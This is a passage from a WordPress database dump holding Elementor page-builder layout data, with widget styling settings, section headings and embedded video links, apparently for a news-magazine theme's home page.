,\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\",\"category_bg_color\":\"#357edd\",\"margin_bottom\":10},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1422,491,'_elementor_version','0.4'),(1423,491,'_elementor_css','a:3:{s:4:\"time\";i:1508920344;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1425,492,'_elementor_edit_mode','builder'),(1426,492,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"